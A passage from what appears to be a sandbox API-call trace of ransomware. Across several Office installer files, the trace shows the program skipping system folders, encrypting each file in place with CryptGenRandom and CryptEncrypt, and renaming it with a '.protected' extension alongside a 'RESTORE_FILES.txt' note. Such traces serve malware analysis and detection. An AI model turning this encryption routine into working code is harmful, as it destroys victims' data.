(lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0062.543] StrStrW (lpFirst="osetup.dll", lpSrch=".rar") returned 0x0 [0062.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0062.543] StrStrW (lpFirst="osetup.dll", lpSrch=".zip") returned 0x0 [0062.543] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.566] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.566] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.567] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.567] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.688] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.688] CloseHandle (hObject=0xb4) returned 1 [0062.689] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.protected") returned 87 [0062.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.protected")) returned 1 [0062.690] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0062.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files") returned -1 [0062.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files (x86)") returned -1 [0062.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$Recycle.bin") returned 1 [0062.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="System Volume Information") returned -1 [0062.690] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0062.690] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".protected") returned 0x0 [0062.690] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="RESTORE_FILES.txt") returned -1 [0062.690] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.690] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.690] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.691] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0062.691] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") returned 0x0 [0062.691] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0062.691] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".rar") returned 0x0 [0062.691] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0062.691] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".zip") returned 0x0 [0062.691] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.718] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.718] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.719] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.719] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.755] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.755] CloseHandle (hObject=0xb4) returned 1 [0062.756] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected") returned 89 [0062.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.protected")) returned 1 [0062.756] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.756] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0062.756] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files") returned -1 [0062.757] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files (x86)") returned -1 [0062.757] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$Recycle.bin") returned 1 [0062.757] lstrcmpiW (lpString1="PidGenX.dll", lpString2="System Volume Information") returned -1 [0062.757] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0062.757] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".protected") returned 0x0 [0062.757] lstrcmpW (lpString1="PidGenX.dll", lpString2="RESTORE_FILES.txt") returned -1 [0062.757] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.757] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.757] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.757] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0062.757] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0062.757] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0062.757] StrStrW (lpFirst="PidGenX.dll", lpSrch=".rar") returned 0x0 [0062.757] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0062.757] StrStrW (lpFirst="PidGenX.dll", lpSrch=".zip") returned 0x0 [0062.757] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.777] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.777] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.777] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.777] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.812] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.812] CloseHandle (hObject=0xb4) returned 1 [0062.812] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected") returned 88 [0062.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.protected")) returned 1 [0062.813] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.813] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0062.813] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files") returned -1 [0062.813] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files (x86)") returned -1 [0062.813] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$Recycle.bin") returned 1 [0062.813] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="System Volume Information") returned -1 [0062.813] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0062.813] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".protected") returned 0x0 [0062.813] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="RESTORE_FILES.txt") returned -1 [0062.813] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.813] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.813] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0062.833] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0062.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0062.833] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".rar") returned 0x0 [0062.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0062.833] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".zip") returned 0x0 [0062.834] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.839] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.839] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.840] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.840] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.844] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.844] CloseHandle (hObject=0xb4) returned 1 [0062.844] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected") returned 101 [0062.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.protected")) returned 1 [0062.845] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.845] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="Windows") returned -1 [0062.845] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="Program Files") returned -1 [0062.845] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="Program Files (x86)") returned -1 [0062.845] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="$Recycle.bin") returned 1 [0062.845] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="System Volume Information") returned -1 [0062.845] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0062.845] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".protected") returned 0x0 [0062.845] lstrcmpW (lpString1="PrjProrWW.msi", lpString2="RESTORE_FILES.txt") returned -1 [0062.845] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.845] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.845] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.846] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0062.846] StrStrW (lpFirst="PrjProrWW.msi", lpSrch=".txt") returned 0x0 [0062.846] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0062.846] StrStrW (lpFirst="PrjProrWW.msi", lpSrch=".rar") returned 0x0 [0062.846] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0062.846] StrStrW (lpFirst="PrjProrWW.msi", lpSrch=".zip") returned 0x0 [0062.846] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.849] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.849] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.850] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.850] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.109] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.110] CloseHandle (hObject=0xb4) returned 1 [0063.110] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.protected") returned 90 [0063.110] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.protected")) returned 1 [0063.111] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.111] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="Windows") returned -1 [0063.111] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="Program Files") returned -1 [0063.111] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="Program Files (x86)") returned -1 [0063.111] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="$Recycle.bin") returned 1 [0063.111] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="System Volume Information") returned -1 [0063.111] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0063.111] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".protected") returned 0x0 [0063.111] lstrcmpW (lpString1="PrjProrWW.xml", lpString2="RESTORE_FILES.txt") returned -1 [0063.111] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.111] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.111] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.113] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0063.113] StrStrW (lpFirst="PrjProrWW.xml", lpSrch=".txt") returned 0x0 [0063.113] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0063.113] StrStrW (lpFirst="PrjProrWW.xml", lpSrch=".rar") returned 0x0 [0063.113] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0063.113] StrStrW (lpFirst="PrjProrWW.xml", lpSrch=".zip") returned 0x0 [0063.113] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x1915, lpOverlapped=0x0) returned 1 [0063.114] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe6eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.114] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x1915, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x1915, lpOverlapped=0x0) returned 1 [0063.115] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.115] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.115] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.115] CloseHandle (hObject=0xb4) returned 1 [0063.115] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.protected") returned 90 [0063.115] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.protected")) returned 1 [0063.116] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.116] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="Windows") returned -1 [0063.116] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="Program Files") returned -1 [0063.116] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="Program Files (x86)") returned -1 [0063.116] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="$Recycle.bin") returned 1 [0063.116] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="System Volume Information") returned -1 [0063.116] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0063.116] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".protected") returned 0x0 [0063.116] lstrcmpW (lpString1="PrjPrrWW.cab", lpString2="RESTORE_FILES.txt") returned -1 [0063.116] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.116] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: 